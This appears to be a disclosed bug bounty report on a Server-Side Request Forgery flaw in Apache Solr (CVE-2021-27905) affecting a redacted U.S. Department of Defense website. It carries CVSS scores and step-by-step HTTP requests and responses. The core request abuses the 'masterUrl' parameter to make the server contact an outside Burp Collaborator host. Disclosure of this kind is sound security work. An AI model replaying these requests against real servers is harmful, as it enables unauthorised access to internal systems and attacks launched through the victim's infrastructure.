FdeleiteH1:1183472U.S. Dept Of Defense: SSRF due to CVE-2021-27905 in www.████████
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.8%
Apache Solr is vulnerable to SSRF using the parameter “masterUrl”. This issue is registered as CVE-2021-27905.
Impact
A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution.
An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage.
Supporting Material/References
https://portswigger.net/web-security/ssrf
https://www.anquanke.com/post/id/238201
System Host(s)
www.██████████
Affected Product(s) and Version(s)
CVE Numbers
CVE-2021-27905
Steps to Reproduce
Steps To Reproduce
First wee need to send this GET request
GET /solr/admin/cores?wt=json HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 1002
Cache-Control: max-age=2592000
Content-Type: text/plain;charset=UTF-8
Date: Tue, 04 May 2021 05:13:17 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
████
Now we can do a HTTP request to the target we want to test it on. I’ll be using Burp Collaborator, to test it yourself, please replace the value accordingly.
Request
GET █████████masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1
Host: www.███
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Accept-Language: en
Connection: close
Accept-Encoding: gzip
Response
HTTP/1.1 200 OK
Connection: close
Content-Length: 174
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Date: Tue, 04 May 2021 05:13:19 GMT
Etag: "17935cb837f"
Expires: Sat, 01 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 04 May 2021 05:13:20 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: ARRAffinity=450f2c90c5749e5ead79f5f3389d0369674c71e046ba20f5151e80e68da4c908;Path=/;Domain=www.██████
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
<?xml version="1.0" encoding="UTF-8"?>
<response>
<lst name="responseHeader"><int name="status">0</int><int name="QTime">0</int></lst><str name="status">OK</str>
</response>
And in Burp’s collaborator we receive a HTTP request from the server:
█████
Suggested Mitigation/Remediation Actions
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.973 High
EPSS
Percentile
99.8%